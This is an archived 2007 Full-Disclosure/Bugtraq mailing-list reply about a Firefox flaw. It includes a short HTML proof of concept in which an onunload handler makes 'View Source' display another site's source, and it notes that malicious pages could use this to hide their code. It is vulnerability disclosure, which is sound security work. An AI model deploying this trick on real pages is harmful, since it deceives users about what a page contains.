lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <45E42FCC.9030508@westpoint.ltd.uk>
Date: Tue, 27 Feb 2007 13:19:08 +0000
From: Richard Moore <rich@...tpoint.ltd.uk>
To: Michal Zalewski <lcamtuf@...ne.ids.pl>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
	security@...illa.org
Subject: Re: Firefox onUnload + document.write() memory
 corruption vulnerability (MSIE7 null ptr)



Michal Zalewski wrote:
> I can't really comment on whether
> this fixes the problem once and for all, because I haven't really examined
> the changes implemented for 364692, but yeah, my example no longer crashes
> the browser for me.

I think there are still underlying problems in the code as the
following illustrates:

1. Put this in a web page, then view it in firefox.

<html>
<body onunload="location = self.location">
<a href="http://slashdot.org/">http://slashdot.org/</a>
</body>
</html>

2. Click on the link which should take you to slashdot and you'll end
up back where you were (this has been known about for ages).

3. Now do 'View Source' and you get shown the sourcecode to slashdot 
rather than the source code for the page you're viewing.

Actual Results:
View source displays the contents of the wrong site

Expected Results:
I'd expect to see the source code for the page I'm viewing.

A web page could trigger the link itself using DOM events (or naviagate
away using javascript form submission) and use this technique to hide
the source code of a malicious page from the user. I did a quick check
that document.cookie wasn't chcking the wrong URL, but I have not
checked extensively which other parts of the browser can be spoofed
in this fashion.

I reported this via bugzilla, but it was closed as a duplicate of bug
253497 which was reported in 2004.

Cheers

Rich.
-- 
Richard Moore, Principal Software Engineer,
Westpoint Ltd,
Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
Tel: +44 161 237 1028
Fax: +44 161 237 1031

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ